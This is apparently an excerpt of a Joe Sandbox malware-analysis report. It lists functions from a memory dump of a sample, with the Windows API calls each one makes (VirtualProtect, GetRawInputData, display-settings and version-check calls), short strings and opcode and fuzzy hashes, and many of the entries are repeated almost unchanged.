Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: ConditionInfoMask$ParametersSystem$ExecutionStateThreadVerifyVersion
String ID: Hcd
API String ID: 2138337975-1373192235
Opcode ID: 979452bf78e6a26bae13934c425d8f3d7aacf65e4f70a9a2e2ee3aaa43562847
Instruction ID: d552217315db711c433609a4cec4eadd01faa30551330ef515e34a60748e55aa
Opcode Fuzzy Hash: 979452bf78e6a26bae13934c425d8f3d7aacf65e4f70a9a2e2ee3aaa43562847
Instruction Fuzzy Hash: 101115B04093449FEB00AF65CA8835ABBF4FF44B19F41D89DE8D84B245D7B98484CF92

Function 64610B26 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 646107E0: VirtualQuery.KERNEL32 ref: 64610867

VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,646012A5), ref: 64610AE7

Strings

,cd, xrefs: 64610B67
,cd, xrefs: 64610B30
,cd, xrefs: 64610B35

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Virtual$ProtectQuery
String ID: ,cd$,cd$,cd
API String ID: 1027372294-2852098346
Opcode ID: 27a0cc24ec2899f064101a97017778c95a2771941521fb0748c90b8f7c6fa918
Instruction ID: f638c8752a7dbe41f4048da6431f0888c62e674f3ed1fb414c928f257171a9b6
Opcode Fuzzy Hash: 27a0cc24ec2899f064101a97017778c95a2771941521fb0748c90b8f7c6fa918
Instruction Fuzzy Hash: ED114876908356CFCF10CF19D88068AB3F2FF8A718F25991AD9896B211D330B956CF81

Function 6460A958 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

EnumDisplaySettingsW.USER32 ref: 6460A9BC
ChangeDisplaySettingsExW.USER32 ref: 6460AA7D
realloc.MSVCRT ref: 6460AAB3
calloc.MSVCRT ref: 6460AAF8

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: DisplaySettings$ChangeEnumcallocrealloc
String ID:
API String ID: 3544475687-0
Opcode ID: a41ff70199d10c02772b2ed234642cbb0a79003aa1bc3d49f4ffc233d63aba94
Instruction ID: c93ec9d385b3a10b2921e0670dd044a3fb0b81f4653e2be81fd693868db3d0a6
Opcode Fuzzy Hash: a41ff70199d10c02772b2ed234642cbb0a79003aa1bc3d49f4ffc233d63aba94
Instruction Fuzzy Hash: E1510570904219DFDB25DF28CA847DEBBF4FF59740F0085AAE88897240E7749A85CF82

Function 6460D7CF Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

GetRawInputData.USER32 ref: 6460D811
free.MSVCRT ref: 6460D82D
calloc.MSVCRT ref: 6460D840
GetRawInputData.USER32 ref: 6460D87B

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: DataInput$callocfree
String ID:
API String ID: 253271340-0
Opcode ID: 954507c9f8f9c0fa5b5b9a29e5123a72444107c4e07457c857fea385b82c8961
Instruction ID: 1ed7145e197558902ff6e0cccc15012f54cdcde242d917b0b66c177f5ba52cfe
Opcode Fuzzy Hash: 954507c9f8f9c0fa5b5b9a29e5123a72444107c4e07457c857fea385b82c8961
Instruction Fuzzy Hash: 1041F3B4908385CFDB11EF69C18428EBBF0FF49310F01892AE8989B245D7B19895CF82

Function 6460844C Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 64608499
calloc.MSVCRT ref: 646084C5
WideCharToMultiByte.KERNEL32 ref: 64608502
free.MSVCRT ref: 64608522

Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorFormatLastMessagecallocfree
String ID:
API String ID: 1537213191-0
Opcode ID: 3d0c78a17ad77bacfd292b0c00cf2782b6b12de301c58f07c63f4f81ae6a1bd5
Instruction ID: ef536ac8975c90811966666c3dcde00199d1f5530d8d2836d31ad81eeeae261d
Opcode Fuzzy Hash: 3d0c78a17ad77bacfd292b0c00cf2782b6b12de301c58f07c63f4f81ae6a1bd5
Instruction Fuzzy Hash: F321D6B05093019FE350EF69D54434EBFE4EF85764F008A2EE4D88B290D7B9C9898B93

Function 6460877D Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32 ref: 646087DA
VerSetConditionMask.KERNEL32 ref: 646087F6
VerSetConditionMask.KERNEL32 ref: 64608812
RtlVerifyVersionInfo.NTDLL ref: 64608830

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersion
String ID:
API String ID: 2793162063-0
Opcode ID: b15dccf56477bde5318b4f68f24da93d82684037e847ed2ac8d9eb5989c5f478
Instruction ID: 4a59f3fe28d3ad8b5ea2a09b7c1bad3ccb1520fbea3e1431eb5efdb67375cc92
Opcode Fuzzy Hash: b15dccf56477bde5318b4f68f24da93d82684037e847ed2ac8d9eb5989c5f478
Instruction Fuzzy Hash: 1A11DAB08083049FEB11AF29C5493AABFF4EB84354F00C85DE5D887281E7B99598CF82

Function 64602F6E Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: ec2cc9c99320ea792083c759f0b5b32b1460c23741c03a6f318325e4b3715790
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: ec2cc9c99320ea792083c759f0b5b32b1460c23741c03a6f318325e4b3715790
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602F44 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: e3dab228de318dfc6ea312c43b609d844db44e877f9dd8aa1410c2acb6c954e4
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: e3dab228de318dfc6ea312c43b609d844db44e877f9dd8aa1410c2acb6c954e4
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602F59 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: 3044d3b78d5a737cd0ba3ce62582d579fbd8dc1c671cf09e7d97e15f0688a9cf
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: 3044d3b78d5a737cd0ba3ce62582d579fbd8dc1c671cf09e7d97e15f0688a9cf
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602FEF Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: b024e20fd1ac5cf0abd56b393151b0c3e416e959e0e1641dc301de79ef919e2e
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: b024e20fd1ac5cf0abd56b393151b0c3e416e959e0e1641dc301de79ef919e2e
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602FCB Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: 904ceed22d49ab97418f70abad013f8d0f19ab29fab4b1345db1653271da0f0c
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: 904ceed22d49ab97418f70abad013f8d0f19ab29fab4b1345db1653271da0f0c
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602FDD Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: d4ce6788a16016415d95563c1a5f72ef11e1afc421299125907f954b73946493
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: d4ce6788a16016415d95563c1a5f72ef11e1afc421299125907f954b73946493
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602FA7 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: 894d9e19391c7671d5045d8304978958721384f8ea430e3b6d567a1afbd35767
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: 894d9e19391c7671d5045d8304978958721384f8ea430e3b6d567a1afbd35767
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602FB9 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: 92b6e789aec27669b293b6c0be98687b4830d1ed129aaa0fc392377fbff5ffeb
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: 92b6e789aec27669b293b6c0be98687b4830d1ed129aaa0fc392377fbff5ffeb
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

